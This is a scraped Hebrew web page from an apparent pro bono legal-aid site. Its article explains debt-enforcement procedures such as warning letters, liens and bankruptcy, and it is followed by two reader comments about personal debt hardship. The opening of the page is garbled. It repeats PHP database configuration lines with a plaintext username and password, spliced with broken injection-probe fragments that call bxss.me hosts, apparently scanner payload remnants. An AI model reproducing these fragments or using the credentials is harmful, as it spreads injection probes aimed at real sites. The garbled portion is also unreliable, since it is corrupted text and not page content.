$db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> $db_host = "1"; $db_u $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> ?> ?>; $db_name = "1"; ?>b_name = "1"; ?>esb9769.bxss.me.')[3].to_s)+'"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?>_pass = "g00dPa$$w0rD"; $db_name = "1"; ?>; ?>'hiteptjlxcjea2c2f9.bxss.me')")"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> ?> יש לך תיקי הוצאה לפועל? עורך דין הוצאה לפועל לשירותך פרובונו
x

דיווח על תקלה

תאור תקלה:
שם:
דואר אלקטרוני:
יצירת קשר
חיפוש באתר
מאמרים אחרונים

יש לך חובות ותיקי הוצאה לפועל? לא הכל אבוד!

תאריך: 10/10/2010 00:28   מחבר: מערכת פרובונו

גוף ההוצאה לפועל נועד לפעול לגביית חובות מחייבים אשר לא פרעו חובם בזמן ואשר עומד כנגדם פסק דין לתשלום חובם. שיק או שטר חוב שלא נפרעו, דמי מזונות שלא שולמו, שטר משכון או משכנתא, וכן כל הסכם לגביית כספים הקביל בבית המשפט, יכולים להוות עילה לפתיחת תיק הוצל"פ כנגד החייב ונקיטת צעדים מטעם ההוצל"פ לגביית החוב.

התמודדות מול צווי עיקול, חקירת יכולת, צווי עיכוב יציאה מהארץ ואף צווי מאסר מטעם הלשכת ההוצאה לפועל הינה חוויה קשה ולא נעימה הן לחייב עצמו והן לבני משפחתו ולקרובים לו, אשר יכולים למצוא עצמם ערבים לו מטעמים חוזיים או נסיבתיים.

גם אדם המוצא עצמו במעמד של נושה, עומד בפני סיטואציות לא נעימות. הצורך להתמודד מול מנגנון בירוקרטי ומסובך לצורך גביית כספים המגיעים לכם בדין, ואשר חוסר פרעונם מעמיד אתכם בבעיות כלכליות הינה סיטואציה לא קלה. כמו כן, על מנת להשתמש במנגנוני הוצאה לפועל בהצלחה לצורך גביית חוב במהירות וביעילות, יש להכיר היטב את הליכי ההוצל"פ ולפעול בהתאם ובזמן להפעלתם.

מסיבות אלה, מומלץ ביותר כי אדם אשר נפתח נגדו תיק הוצל"פ, או החושש כי עלול להיפתח נגדו תיק, וכן אדם המעוניין לפנות להוצל"פ לצורך גביית חוב – מומלץ כי יפנו בהקדם לייעוץ וסיוע משפטי.

הליכי הוצאה לפועל מרכזיים שבהם מומלץ לפנות אל עורך דין לצורך יצוג משפטי

קבלת מכתב אזהרה וזימון לחקירת יכולת: קבלת מכתב אזהרה מטעם ההוצל"פ - משמעות הדבר כי יש בידיך האפשרות להגיש התנגדות בכתב תוך 20 יום מיום קבלת האזהרה.  אם אין לך סיבה להתנגד לחוב, ואין באפשרותך לפרוע אותו תוך 20 יום, תזומן לחקירת יכולת בפני ראש ההוצל"פ על מנת לברר את סך הכנסותיך ואמצעיך הכלכליים, וזאת על מנת לקבוע הסדר לתשלום החוב או להכריז עליך כמוגבל באמצעים.

קבלת צו עיקול: עם קבלת צו עיקול מומלץ לפנות לסיוע משפטי על מנת לפעול בזמן ועל פי ההליכים הדרושים, להשהיית צו העיקול  או ביטולו ולהפעיל במקביל הליכים למניעת מכירת הרכוש או ערעור על הליכי הוצאה לפועל.

פשיטת רגל: ייצוג משפטי בהליכי פשיטת רגל, יסייע לך להגן על האינטרסים שלך בפני הנושים והבנקים ולמזער ככל האפשר את נזקיך.

הוצא נגדך צו עיקול? אתה עומד בפני פשיטת רגל? קיבלת מכתב אזהרה מההוצאה לפועל?

אתר זה בא לאפשר לכל אדם שהסתבך בחובות כספיים ונפתח נגדו תיק הוצל"פ או אדם המעוניין לפעול לפריעת שיק, שטר חוב או תשלומי מזונות, אך אין בידו האמצעים הדרושים לשלם עבור יעוץ משפטי, לקבל סיוע מעורכי דין המתמחים בתחום בהתנדבות וללא תשלום. 

אנא פנה אלינו באמצעות טופס יצירת הקשר באתר ואנו ננתב את פנייתך אל עורך דין המתמחה בנושא הוצאה לפועל שיענה לפנייתך.

קיראו מידע ומאמרים נוספים באתר
איחוד תיקים בהליכי הוצאה לפועל - למי זה מתאים והאם כדאי? - מתנהלים נגדך מספר תיקים בהוצאה לפועל? מתלבט אם להגיש בקשת איחוד תיקים? קרא במאמר המלא על הליך זה ועל אפשרות קבלת ייעוץ משפטי מעורך דין פרובונו...
ליחצו כאן להוספת תגובה
1. הוצאה לפועל- עיקול
אנא צרו קשר העיריה לקחה את ההכנסה היחידה - פנסיה בסך 3000 ש"ח מצהל אין לי להתקיים+אשתי נכה בשיעור 74% +תרופות יקרות לי ולאשתי, אין מאין אנא לחמתי ב-4 מחלמות והיום אין לי למי לפנות. שלחתי אליכם הפרטים כמצוין ולא נענתי. בבקשה דחוף לטפל בנושא. בהכרת תודה מראש.
סגור
הוסף תגובה

אורי 27/10/2010 08:39
2. הוצל"פ לבן זוגי
רציתי לברר בבקשה אני נשואה 3 שנים ויש לי ולבן זוגי ילד בן שנתיים לבן זוגי יש תיק הוצל"פ בגין חוב מלפני 9 שנים. הדירה שאנו חיים בה היא בחוזה שכירות הרשום על שמי וכל תכולת הדירה- ריהוט וספרים הם שלי- השאלה שלי האם הוצל"פ יכולים להיכנס לדירה למרות שהחוזה הוא על שמי ולא על שם שנינו ולעקל גם דברים שהיו שלי עוד לפני הנישואים כמו רהיטים ישנים- רואים שהם ישנים מאוד. יש דברים שנשארו לי עליהם קבלות שהם שלי- קבלות על השם שלי- כמו על הגיטרה שלי שקניתי חודשיים אחרי החתונה - האם הם יכולים לעקל חפצים שלי שניקנו בשקים או בכרטיס אשראי שלי- אין לנו חשבון בנק משותף- ליתר דיוק לו אין חשבון בנק בכלל והאם גם מעקלים מחשב, ספרים וצעצועים? ומה אני צריכה לעשות כדי להגן על הרכוש שלי? הו אני ממש אשמח לעזרה- בן זוגי סובל גם מפוסט טראומה משני פיגועים שהיה נוכח בהם והיה שרוי בדיכאון ובמצב של חוסר איכפתחות בתקופה שנוצרו חובות אלו- יש לו חוות דעת פסיכיאטרית המעידה עליו כסובל מפוסט טראומה- הוא לא תבע את ביטוח לאומי כי בפעמיים שהלך לשם הוא חזר בוכה ושבוע אחר-כך לא יכל לישון- זה רק החמיר את מצבו מה אליי לעשות? תודה מראש אנסטסיה
סגור
הוסף תגובה

אנסטסיה 26/10/2010 20:04
סגור



סגור